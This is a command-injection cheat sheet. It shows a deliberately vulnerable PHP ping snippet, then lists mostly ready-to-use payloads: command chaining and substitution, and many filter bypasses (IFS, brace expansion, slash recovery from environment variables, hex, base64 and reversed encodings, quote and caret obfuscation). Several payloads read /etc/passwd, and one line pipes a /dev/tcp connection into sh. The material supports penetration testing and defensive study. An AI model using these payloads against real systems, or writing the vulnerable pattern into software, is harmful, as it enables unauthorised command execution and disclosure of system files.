command-injection

Command Injection

Command injection is a security flaw that allows attackers to run arbitrary system commands on a server. It occurs when user input is improperly validated and passed to a shell or command-line interpreter.

Vulnerable Code

Following is a example how direct input is being passed to system() function without validation of any kind.

$user = $_GET['user'];
echo system("ping -c 1 " . $user);

If an attacker provides input like 8.8.8.8; cat /etc/passwd, the actual command that gets executed would be: ping -c 1 8.8.8.8; cat /etc/passwd.

Automated Tools

• Bashfuscator - We can use this to bypass filters.
• Invoke-DOSfuscation - Same as above but for PowerShell.

---

Chaining Commands

command1; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2  # Execute command1 in the background
command1 | command2  # Pipe the output of command1 into command2
command1%0acommand2 # We can also try new line = %0a (\n) 

Substitution

`cat /etc/passwd`    # Using backtick
$(cat /etc/passwd)   # Using $()

<strong># More Tricks
</strong>who$()ami
who$(echo am)i
who`echo am`i

Filter Bypasses

Space is not Allowed

<strong># Using special shell variable called the 'Internal Field Separator'
</strong>cat${IFS}/etc/passwd
ls${IFS}-la

<strong># Brace Expansion
</strong>{cat,/etc/passwd}
{ls,-la}

<strong># Input redirection
</strong>cat&#x3C;/etc/passwd
sh&#x3C;/dev/tcp/127.0.0.1/4242

<strong># Windows Specific (Using Environment Variables)
</strong>ping%CommonProgramFiles:~10,-18%127.0.0.1
ping%PROGRAMFILES:~10,-5%127.0.0.1
ping$env:PROGRAMFILES[10]127.0.0.1 # PowerShell Specific

<strong># Must Try
</strong><strong># Use tabs instead of spaces with this URL-Encoded: %09
</strong>

Backslash (\) Newline

<strong>rezy@dev:~$ cat /et\
</strong><strong>c/pa\
</strong><strong>sswd
</strong>
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[//..SNIP..//]

<strong># URL-Encoded Version
</strong>cat%20/et%5C%0Ac/pa%5C%0Asswd

Tidle Expansion

echo ~+ # shows the current working directory ($PWD).
echo ~- # shows the previous working directory ($OLDPWD).

More Brace Expansion

{,ip,a}
{,ifconfig}
{,ifconfig,eth0}
{l,-lh}s
{,echo,#test}
{,$"whoami",}
{,/?s?/?i?/c?t,/e??/p??s??,}

/ is not Allowed

We can use environment variables to retrive forward-slashes.

<strong># Using ${HOME:0:1}
</strong>cat ${HOME:0:1}etc${HOME:0:1}passwd

## Using ${PATH:0:1}
cat ${PATH:0:1}etc${PATH:0:1}passwd

<strong># Using:
</strong><strong># echo . | tr '!-0' '"-1'
</strong><strong># Or
</strong><strong># tr '!-0' '"-1' &#x3C;&#x3C;&#x3C; .
</strong>cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Bypass Using Encoding

<strong># Hex Encoding
</strong>cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
cat `xxd -r -p &#x3C;&#x3C;&#x3C; 2f6574632f706173737764`

<strong># Base64 Encoding
</strong>echo -n 'cat /etc/passwd' | base64
bash&#x3C;&#x3C;&#x3C;$(base64 -d&#x3C;&#x3C;&#x3C;Y2F0IC9ldGMvcGFzc3dk)

<strong>## Windows (PowerShell) - Execute Base64 String
</strong>iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Reverse Strings

echo 'cat /etc/passwd' | rev

<strong># Execute (Linux)
</strong>$(rev&#x3C;&#x3C;&#x3C;'dwssap/cte/ tac')

<strong># Execute (Windows)
</strong>iex "$('imaohw'[-1..-20] -join '')"

Quotes and Backticks

<strong># Single
</strong>w'h'o'am'i
wh''oami
'w'hoami

<strong># Double
</strong>w"h"o"am"i
wh""oami
"wh"oami

<strong># Backticks
</strong>wh``oami

Backslash and Slash

w\ho\am\i
/\b\i\n/////s\h

Positional Parameter Character ($@) and Caret

It refers to the name of the script if it's being run as a script. If you're in an interactive shell session, $0 will typically give the name of the shell

<strong># $@
</strong>who$@ami
echo whoami|$0

<strong># Caret (WINDOWS/CMD)
</strong>who^ami